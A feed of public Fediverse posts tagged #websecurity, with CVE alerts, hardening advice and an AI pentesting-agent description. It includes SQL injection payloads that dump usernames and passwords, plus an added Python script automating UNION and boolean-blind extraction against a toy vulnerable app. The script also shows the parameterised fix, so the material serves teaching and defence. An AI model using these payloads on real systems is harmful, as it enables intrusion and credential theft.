home.social

#websecurity — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #websecurity, aggregated by home.social.

  1. What is Web Security and Web Penetration Testing Tools

    In this article, I cover essential web penetration testing tools and how they fit into different stages of the assessment process.
    denizhalil.com/2024/12/19/web-

    #CyberSecurity #WebSecurity #Pentesting #BurpSuite #Nmap #SQLMap #BugBounty #RedTeam #InfoSec #EthicalHacking #SecurityTools #DenizHalil

2. FROST: a website can spy on which tabs or apps you are using by measuring SSD I/O from JavaScript, with no extra action from the user. aidoo.news/noticia/rggwdl

    #SeguridadInformatica #WebSecurity #SSD #Navegadores #Investigacion

  4. If your WordPress malware keeps returning hours after you clean it, the infection probably is not in WordPress at all. I have seen this exact pattern — clean wp-config.php, it comes back, clean again, still back. A forensic case study shows how a webmail log file became a root-level backdoor, sitting entirely below WordPress where no security plugin can reach it.

    #WordPress #SecurityHardening #Malware #WebSecurity

    wpguy.uk/blog/why-cleaning-wor

  5. ----------------

    🛠️ Tool
    ===================

    Agent Zero Penetration Tester is a GitHub repository that configures a single Agent Zero instance as a specialized web application penetration testing agent. The agent operates autonomously within a defined scope, uses only integrated tools, and produces evidence-rich professional results.

    Key Features

    The repository provides a complete agent configuration:
    • Role prompt defining methodology, capabilities, and reporting framework
    • Context file with high-level agent description
    • User mission prompt specifying operational workflow and success criteria
    • Tool manifest (a0toolssetting.json) consumed by the platform runtime
    • Model testing prompt for evaluating AI models on pentesting tasks
    • Sandbox documentation for safe execution environments

    Technical Implementation

    Two tools drive operation:

    1. code_execution_tool() runs command-line security tools. The prompt enforces sequencing constraints, like waiting for nikto to complete before starting gobuster. The runtime="output" parameter distinguishes completed processes from in-progress ones.

    2. browser_agent() handles web interaction with a strict allowlist: only the origin of base_url (scheme://host:port) and same-host routes are accessible. The agent must open base_url first before navigating via UI.

    Target configuration is read exclusively from /a0/tmp/initialinput.json inside the container. Example: base_url: http://127.0.0.1:3000 with demo credentials. No repository fallback exists.

    Model Testing Framework

    modeltestingprompt.md evaluates AI models on pentesting tool syntax accuracy, error handling, tool selection, and methodology adherence. This evaluates formulation ability, not live exploitation capability.

    Scope and Safety

    Safety constraints are defined in both the role prompt and the mission prompt. The browser allowlist limits exposure to intended targets. The agent is designed to stay within defined boundaries.

    Use Cases
    • Automated web app vulnerability assessment in controlled environments
    • AI model evaluation for pentesting tool competence
    • Security testing workflow validation and training
    • Juice Shop scenarios with pre-configured defaults

    Limitations

In my assessment, the repository assumes familiarity with Agent Zero's platform. No independent testing has been conducted. The model testing prompt evaluates syntax and methodology, not real-world exploitation effectiveness. A demo video is available showing the agent in action.

    🔹 tool #pentesting #agentzero #websecurity #AIagent

    🔗 Source: github.com/StirlingGoetz/a0pen

  6. 74% of hacked WordPress sites were running outdated plugins at the time of breach. In my experience, most WordPress compromises are not clever attacks — they are automated scanners finding the weakest door. I have written up the five most common entry points I see in 2025 and what to do before the scanner finds you.

    #WordPress #WordPressSecurity #SecurityHardening #WebSecurity

    wpguy.uk/blog/why-wordpress-si

7. Deutsche Bahn was blocking Linux users on its website: not out of malicious intent, but through browser-detection logic that silently excluded certain user agents.

    This kind of invisible friction deserves attention: less access means less visibility into public services. Diversity of HTTP clients is also resilience.

    #Linux #WebSecurity #infosec
    feed.itsfoss.com/link/24361/17

  8. Patch immediately before public exploits emerge.

    drupal.org/sa-core-2026-004

    Affected:

- 8.9.0, < 10.4.10
    - 10.5.0, < 10.5.10
    - 10.6.0, < 10.6.9
    - 11.0.0, < 11.1.10
    - 11.2.0, < 11.2.12
    - 11.3.0, < 11.3.10

    CVE-2026-9082 - Highly critical - SQL Injection
    CVE-2026-8495 - Missing Authorization
    CVE-2026-8493 - XSS
    CVE-2026-8492
    CVE-2026-8491

    #Drupal #PHP #CyberSecurity #Infosec #CVE #WebSecurity #PostgreSQL #SqlInjection #PrivilegeEscalation #XSS

  12. 📆 21 May 2026 - tomorrow!

    "What Are Web Developers Doing About Security?" by @torgo at the Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

In this talk Dan Appelquist, Samsung Open Source Group, will give a brief introduction to SWAG, an overview of the surprising results, what it means for the work ahead, and how web developers and web browser developers are responding to the requirements of the CRA.
    #WebStandards #WebSecurity #WebDevelopers #OpenSSFCommunity

    w3.org/events/talks/2026/what-

  13. Published a new article: “Gadget Hunting in Practice”

    The article focuses on practical prototype pollution hunting methodology:
    • confirming pollution correctly
    • identifying gadgets
    • tracing execution sinks
    • understanding weak vs strong sinks
    • using DOM Invader and ppmap effectively

    One of the biggest mistakes beginners make is trying to prove pollution, gadget discovery, and exploitation all at once.

    medium.com/@marduk.i.am/a7f8b0

    #bugbounty #xss #infosec #cybersecurity #websecurity

  15. CW: Human+AI

It is always a bit stressful to see a "Not Secure" warning on your own website. Usually it means your SSL certificate is missing. You can fix "Not Secure" warning errors by installing a certificate and forcing HTTPS. It makes a huge difference for privacy and trust. Here is a guide to help: gwizit.com/go/BF6MRHQ. We hope this helps you stay secure.

    #WebSecurity #SmallBusiness #OnlinePrivacy #TechSupport

  16. A critical authentication bypass in the Burst Statistics plugin scored 9.8 on the CVSS scale — meaning attackers could take full admin control of a WordPress site with zero credentials. Over 200,000 sites were exposed. If you are running this plugin, my advice is simple: update it now.

    #WordPress #WordPressSecurity #SecurityHardening #WebSecurity #CyberSecurity

    wpguy.uk/200000-wordpress-site

  17. Day 12 #Pentesting: SQL injection exploitation techniques that actually matter on engagements.

    The jump from "I found an injection" to "here's the admin password hash" requires systematic work:

    ```
    -- Find columns
    ' ORDER BY 3-- -
    -- Find visible column
    ' UNION SELECT 'a','b','c'-- -
    -- Extract data
    ' UNION SELECT null,CONCAT(user,':',pass),null FROM users-- -
    ```

    Blind SQLi is where patience gets tested. One character at a time via boolean conditions. sqlmap handles the automation, but understand the manual process first.

    #Infosec #Websecurity #Cybersecurity #Ctf
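As an added example that is not part of the post above: the three UNION steps from the snippet, followed by the boolean-blind extraction the post only describes in words, run end to end against a deliberately vulnerable toy application. Everything here is constructed for the example: the in-memory SQLite database, the two users (the hashes are MD5 of "password" and "123456"), and the `search` / `exists` endpoints. Where SQLite differs from the post's MySQL-style payloads it is marked in a comment (`||` instead of CONCAT, a raised exception standing in for the backend's error page).

```python
import sqlite3

# Constructed demo data (not from the original post): MD5 of "password" and "123456".
SAMPLE_USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("alice", "e10adc3949ba59abbe56e057f20f883e"),
]


class VulnerableApp:
    """Toy app whose queries are built by string concatenation (deliberately vulnerable)."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
        self.conn.executemany("INSERT INTO users (user, pass) VALUES (?, ?)", SAMPLE_USERS)
        self.queries = 0  # round trips to the database, to show what blind extraction costs

    def search(self, name):
        """Profile search that renders the second column back to the page (UNION-exploitable)."""
        self.queries += 1
        sql = f"SELECT id, user, 'n/a' FROM users WHERE user = '{name}'"
        return [row[1] for row in self.conn.execute(sql)]

    def exists(self, name):
        """Username check that only ever answers yes/no (boolean-blind)."""
        self.queries += 1
        sql = f"SELECT 1 FROM users WHERE user = '{name}'"
        return self.conn.execute(sql).fetchone() is not None

    def exists_safe(self, name):
        """Same check with a bound parameter: the payload is just an odd username."""
        self.queries += 1
        return self.conn.execute("SELECT 1 FROM users WHERE user = ?", (name,)).fetchone() is not None


# --- UNION-based: count columns, then dump through the column the page reflects ---

def find_column_count(app, limit=10):
    """Step 1 of the post: raise ORDER BY n until the backend errors; the last good n is the width.
    SQLite raises OperationalError where a real site would show an error page or a blank result."""
    for n in range(1, limit + 1):
        try:
            app.search(f"x' ORDER BY {n}-- -")
        except sqlite3.OperationalError:  # "ORDER BY term out of range"
            return n - 1
    return limit


def union_dump(app):
    """Step 3 of the post in SQLite dialect: '||' where MySQL uses CONCAT(); NULL pads the other columns."""
    payload = "x' UNION SELECT NULL, user || ':' || pass, NULL FROM users-- -"
    return sorted(app.search(payload))


# --- Boolean-blind: one bit per request; binary search instead of walking 1..127 per character ---

def blind_oracle(app, condition):
    """True iff the injected condition holds on the admin row."""
    return app.exists(f"admin' AND ({condition})-- -")


def _search_int(app, predicate, hi):
    """Smallest v in [0, hi] for which predicate(v) ('value > v') is false, i.e. the hidden value."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if blind_oracle(app, predicate(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(app, subquery, max_len=64):
    """Recover the scalar result of `subquery` without it ever appearing in a response."""
    length = _search_int(app, lambda v: f"LENGTH(({subquery})) > {v}", max_len)
    chars = []
    for i in range(1, length + 1):
        code = _search_int(app, lambda v: f"UNICODE(SUBSTR(({subquery}), {i}, 1)) > {v}", 127)
        chars.append(chr(code))
    return "".join(chars)


ADMIN_HASH = "SELECT pass FROM users WHERE user = 'admin'"

if __name__ == "__main__":
    app = VulnerableApp()
    print("columns:", find_column_count(app))
    print("union dump:", union_dump(app))
    before = app.queries
    print("blind:", blind_extract(app, ADMIN_HASH), "in", app.queries - before, "requests")
    print("same payload against the parameterised check:", app.exists_safe("admin' AND (1=1)-- -"))
```

Run it as a script: the UNION path needs a handful of requests, while pulling the same 32-character hash blind costs a few hundred even with binary search, which is the "patience" the post refers to. The final line shows why the fix is parameterisation rather than filtering: bound as a parameter, the identical payload is looked up as a literal username and matches nothing.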

  18. 🚨 CVE-2026-2347 — CRITICAL auth bypass in Akilli Commerce E-Commerce Website <4.5.001 via user-controlled key. Session hijack risk. No patch yet — restrict access, monitor sessions. radar.offseq.com/threat/cve-20 #OffSeq #CVE20262347 #infosec #websecurity

  22. FYI: Chrome on Android now lets users share approximate location with websites: Chrome for Android adds approximate location sharing, giving users a middle-ground privacy option between full location access and denial for website requests. ppc.land/chrome-on-android-now #Chrome #Android #Privacy #LocationSharing #WebSecurity

  26. The one header I didn't add yet: CSP.

    For sites that render untrusted input it mitigates an active surface. For a static site it guards against rarer-but-bigger events: a compromised analytics script, a poisoned CDN, a future change that adds an input path.

    Astro 6 added an integration for what it emits; iframes, external fonts, and third-party services stay manual. Will inshallah follow when the audit fits.

    #CSP #WebSecurity #Astro #StaticSite

  29. 📆 21 May 2026, 16:00–16:10 CDT
    "What Are Web Developers Doing About Security?" by @torgo at Open Source SSF Community Day, Minneapolis, MN, USA 🇺🇸

    The W3C SWAG community group ran a survey to see what web security features and technologies web developers are using and how they're using them. This talk will be a brief introduction to SWAG, an overview of the surprising results, and what it means for the work ahead.
    w3.org/events/talks/2026/what-
    #WebStandards #WebSecurity #OpenSSFCommunity

  34. Enabled HSTS with includeSubDomains and preload.

    The cost is real and one-way: every current and future subdomain must serve HTTPS or become unreachable. Removal from the preload list is in browser-release hands, not yours.

    Accepted because the site is HTTPS-only by intent and Caddy provisions certs for every subdomain automatically via Let's Encrypt.

    #HSTS #WebSecurity #Caddy #SelfHosting
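An added example, not part of either the CSP post or the HSTS post above, for the check a practitioner would want before committing to either header: a small offline lint for the header values themselves. The HSTS rules encode the header-level requirements of the hstspreload.org submission form (max-age of at least one year, includeSubDomains, preload); the live checks that site also performs (certificate validity, HTTP-to-HTTPS redirect on the bare host) need a running server and are out of scope here. The CSP rules flag the settings that would leave a static site exposed to exactly the events the CSP post names (injected inline script, any origin able to supply script). The header strings in the `__main__` block are constructed inputs.

```python
ONE_YEAR = 31536000  # seconds; the preload list requires a max-age of at least one year


def parse_hsts(value):
    """Split 'max-age=N; includeSubDomains; preload' into a case-insensitive directive map."""
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            directives[name.lower()] = val.strip().strip('"') or None
    return directives


def hsts_preload_problems(value):
    """Reasons the header itself would fail preload submission; [] means the header is eligible."""
    d = parse_hsts(value)
    problems = []
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        problems.append("max-age missing or not an integer")
    elif int(max_age) < ONE_YEAR:
        problems.append(f"max-age={max_age} is below one year ({ONE_YEAR})")
    if "includesubdomains" not in d:
        problems.append("includeSubDomains missing: preload covers the whole domain or nothing")
    if "preload" not in d:
        problems.append("preload directive missing: the list only accepts headers that opt in")
    return problems


def parse_csp(value):
    """Split 'directive src src; directive src' into {directive: [sources]}."""
    policy = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def csp_problems(value):
    """Flag the settings that defeat CSP's purpose on a static site; [] means nothing obvious is wrong."""
    p = parse_csp(value)
    problems = []
    if "default-src" not in p:
        problems.append("no default-src: any fetch directive you did not list is unrestricted")
    scripts = p.get("script-src", p.get("default-src", []))  # script-src falls back to default-src
    nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in scripts)
    if "'unsafe-inline'" in scripts and not nonce_or_hash:
        # CSP Level 2+ browsers ignore 'unsafe-inline' when a nonce or hash is present,
        # so it is only a real hole when it stands alone.
        problems.append("'unsafe-inline' script without nonce/hash: injected inline script runs")
    if "'unsafe-eval'" in scripts:
        problems.append("'unsafe-eval' in script sources: eval() and string-to-code are allowed")
    for src in scripts:
        if src in ("*", "http:", "https:", "data:"):
            problems.append(f"script source {src}: any origin (or inline data:) can supply script")
    if p.get("object-src", p.get("default-src", [])) != ["'none'"]:
        problems.append("object-src not 'none': plugin content can sidestep script-src")
    return problems


if __name__ == "__main__":
    for header in ("max-age=31536000; includeSubDomains; preload", "max-age=300"):
        print(header, "->", hsts_preload_problems(header) or "preload-eligible")
    for policy in ("default-src 'self'; script-src 'self' https://cdn.example.com; object-src 'none'",
                   "script-src 'self' 'unsafe-inline' *"):
        print(policy, "->", csp_problems(policy) or "ok")
```

Two caveats the output cannot show: a clean HSTS header is the cheap half of the decision, since the one-way cost the HSTS post describes (every subdomain, forever) is a property of your DNS zone, not of the string; and a CSP that allowlists a CDN host still trusts that host completely, which is the "poisoned CDN" case the CSP post raises. The lint tells you the policy is not self-defeating, not that the third parties in it are safe.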

  38. 🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. radar.offseq.com/threat/cve-20 #OffSeq #vuln #infosec #websecurity


  41. 🚨 CRITICAL: CVE-2026-44257 in efwGrp efw4.X (<4.08.010) enables remote, unauthenticated command execution via crafted zip uploads and path traversal. Patch to 4.08.010 ASAP. radar.offseq.com/threat/cve-20 #OffSeq #vuln #infosec #websecurity